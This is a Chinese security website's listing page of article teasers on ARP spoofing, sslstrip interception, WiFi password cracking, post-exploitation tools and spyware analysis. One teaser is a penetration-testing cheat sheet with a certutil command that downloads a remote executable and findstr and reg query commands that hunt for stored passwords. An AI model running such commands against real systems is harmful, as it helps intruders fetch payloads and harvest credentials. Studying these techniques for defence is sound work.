首页 网络安全

网络安全

  • 大伙想知道黑客是如何知道你在干什么的嘛?
    由于在局域网中,网关会不断地发送 ARP 数据包询问当前是否有新的客户端上线,如果我们可以欺骗当前局域网网段下的主机,  把我们当成网关地址,并且我们把欺骗的流量转发到真正的网关地址,这样我们就可以嗅探到别人的信息 实验环境:  1、虚拟机 A(kali)  2、实验主机 B(win 10) ...
    安全学院 2019-12-31 16:48 1016
  • Wireshark解密HTTPS流量的两种方法
    原理 我们先回顾一下SSL/TLS的整个握手过程:Clienthello:发送客户端的功能和首选项给服务器,在连接建立后,当希望重协商、或者响应服务器的重协商请求时会发送。version:客户端支持的最佳协议版本Random:共32字节,28字节随机数,4字节额外信息,受客户端时钟影响(为了避免浏览器指纹采集,现在 ...
    安全学院 2019-12-31 16:47 896
  • 相对于其他几种语言来说, PHP 在 web 建站方面有更大的优势,即使是新手,也能很容易搭建一个网站出来。但这种优势也容易带来一些负面影响,因为很多的 PHP 教程没有涉及到安全方面的知识。此帖子分为几部分,每 .. ...
    网站防护 2019-12-31 16:42 1145
  • 如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头!渗透命令:certutil-----从远程url下载文件案例:certutil -urlcache -split -f http://baidu.com/test.exefindstr-----查找文件后缀结果findstr /s /i "pass" *.py*reg query HKLM /f password /t REG_SZ /s-----搜集注 ...
    渗透测试 2019-12-29 11:10 1083
  • VulnHub靶机系列:Os-ByteSec
    搜索公众号:暗网黑客教程可领全套安全课程、配套攻防靶场一 前言Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware ...
    渗透测试 2019-12-28 11:31 1086
  • 经历漫长的等待后,后渗透测试神器 Empire 终于迎来了多项重大功能升级的 3.0 版本(https://github.com/BC-SECURITY/Empire/)。Empire 是一款类似 Metasploit 的 PowerShell 可视化后期渗透测试框架,建立在密码安全通信和灵活的架构上。Empire 实现了无需 powershell.exe 就可运行 PowerShell 代理 ...
    渗透测试 2019-12-27 09:14 1359
  • 在VMware虚拟机下搭建kvm靶机
    搜索公众号:暗网黑客教程可领全套安全课程、配套攻防靶场前言大家搭建kvm靶机时可以直接选择iso镜像搭建,这个一般不会出问题。故此就说下kvm中搭建的镜像,若是选择qcow2的镜像该如何搭建。本文章纯属小白文,欢迎各位大佬吐槽。实验环境:ubuntu16、VMware14一.kvm环境准备先查看虚拟机是否支持kvm.( ...
    安全学院 2019-12-27 09:14 1026
  • 渗透测试很重要,但你真的做对了吗?我们不妨来看看渗透测试中常见的几种错误,谈谈该如何避免这些错误。找出公司安全状态中缺陷和弱点的最有效方式之一,就是让第三方对自身系统展开有计划的攻击。渗透测试旨在暴露出公司防御上的缺口,以便公司能够在被恶意人士利用之前堵上这些缺口。有多种类型的渗 ...
    渗透测试 2019-12-27 09:12 960
  • 利用sslstrip让中间人窃取https信息成为可能
    中间人攻击简单来说就是让本来聊的很happy的client和server在不知情的情况下,插入到两个中间,此时client发送给Server, server回给client的过程就变成了client -> 中间人 -> server, server -> 中间人 -> client这样的话中间人就有了client和server的双方通信信息,并且这双方也感知不到中间 ...
    安全学院 2019-12-27 09:11 801
  • ToTok间谍软件事件与样本简要分析
    ToTok是阿联酋的一种手机通讯应用程序,已有数百万台手机下载并安装。而阿联酋,是一个禁用诸如WhatsApp和Skype之类的聊天APP的国家,因此ToTok的出现引领了一股下载风潮。但据熟悉机密情报评估和对该应用程序及其开发者进行调查的美国官员说,ToTok实际上是一种间谍工具。阿拉伯联合酋长国政府使用它 ...
    安全学院 2019-12-27 09:04 804
  • 在浩瀚的网络中安全问题是最普遍的需求,很多想要对网站进行渗透测试服务的,来想要保障网站的安全性防止被入侵被攻击等问题,在此我们整理了下在渗透安全测试中抓包分析以及嗅探主机服务类型,以及端口扫描等识别应用服务,来综合评估网站安全。8.2.1. TCPDumpTCPDump是一款数据包的抓取分析工具,可以将 ...
    渗透测试 2019-12-27 08:49 1103
  • IOS端的APP渗透测试在整个互联网上相关的安全文章较少,前几天有位客户的APP数据被篡改,导致用户被随意提现,任意的提币,转币给平台的运营造成了很大的经济损失,通过朋友介绍找到我们寻求安全解决方案,防止APP继续被篡改与攻击,针对客户的这一情况我们立即成立安全应急响应小组,对客户的APP以及 ...
    渗透测试 2019-12-27 08:48 1079
  • 瞒天过海—驱动攻击当有些表面看来无害的数据被邮寄或复制到Internet主机上并被执行发起攻击时,就会发生数据驱动攻击。例如,一种数据驱动的攻击可以造成一台主机修改与安全有关的文件,从而使入侵者下一次更容易入侵该系统。趁火打劫UNIX系统可执行文件的目录如/bin/who可由所有的用户进行读访问,这 ...
    安全学院 2019-12-26 10:43 884
  • kali破解wifi握手包-GPU破解,速度快到无法想象
    WIFI握手包破解握手包简单理解就是发送指令与验证指令俗称密码验证 加密方式hash(哈希算法)kali破解wifi密码开始1、选择合适的网卡,有些网卡kali识别不了,我用的网卡信息2、网卡开启监听模式3、查看监听模式是否 ...
    渗透测试 2019-12-26 09:30 12527
  • 美国网络空间作战武器浅析
    当前,网络空间已经成为与空中、陆地、海洋和太空并列的第五空间,无论是国家安全和利益,还是军队的联合作战都日益与网络空间息息相关,网络空间的斗争越来越激烈。在此背景下,网络空间作战应运而生。与传统作战模式不同,网络空间基于虚拟世界,作战兵力部署、武器装备、战术战法都属于颠覆性的存在 ...
    安全学院 2019-12-25 12:09 1048
返回顶部